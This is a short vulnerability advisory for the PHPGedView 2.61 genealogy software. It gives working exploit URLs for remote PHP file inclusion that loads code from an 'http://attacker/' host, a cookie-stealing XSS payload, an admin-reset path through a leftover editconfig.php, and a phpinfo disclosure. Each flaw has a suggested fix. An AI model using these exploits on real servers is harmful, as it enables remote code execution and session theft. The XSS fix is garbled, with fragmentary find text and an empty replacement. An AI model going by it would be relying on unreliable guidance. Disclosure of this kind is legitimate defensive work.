Tittle : Vuln in PHPGEDVIEW 2.61 Lang : PHP Author : Windak Website: www.security.com.vn Version : PHPGEDVIEW 2.61 Multi-Problem Introduction : PHPGEDVIEW is program read projects GEDCOM file ( default html ) . Bug : 1) Php code injection : Rick : Hight - Vuln in any files : functions.php, authentication_index.php ,config_gedcom.php In authentication_index.php file : at line 33 : require $PGV_BASE_DIRECTORY."authenticate.php"; In functions.php file : at line 35 : require($PGV_BASE_DIRECTORY."functions_print.php"); In config_gedcom.php file : at line 115 : if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"); else { $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/"; require($THEME_DIR."theme.php"); Exploit : http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/ http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/ http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/ Script named authenticate.php put in http://attacker/ ( or functions_print.php , theme.php put in folder /themes/standard / FIX : add firt line files have been vuln : Require (config.php); 2) Config again : rick: Medium If you not deleted editconfig.php file after install then attacker can reinstall and change password administrator . Link : http://target/phpgedview_folder/editconfig.php fix : Delete editconfig.php file 3) XSS : Rick : medium Exploit : http://localhost/phpgedview/search.php?action=soundex&firstname="><script>alert(document.cookie)</script> fix : Find : " /> " /> " /> " /> replace with : 4) Show info server : rick : low I can show info server Link: http://target/phpgedview_folder/admin.php?action=phpinfo fix : Find : if (!isset($action)) $action=""; if ($action=="phpinfo") { phpinfo(); exit; } if (!userIsAdmin(getUserName())) { header("Location: login.php?url=admin.php"); exit; } replace with : if (!userIsAdmin(getUserName())) { header("Location: login.php?url=admin.php"); exit; } if (!isset($action)) $action=""; if ($action=="phpinfo") { phpinfo(); exit; } ======================================================================= Windak - Vietnamese Security Group www.security.com.vn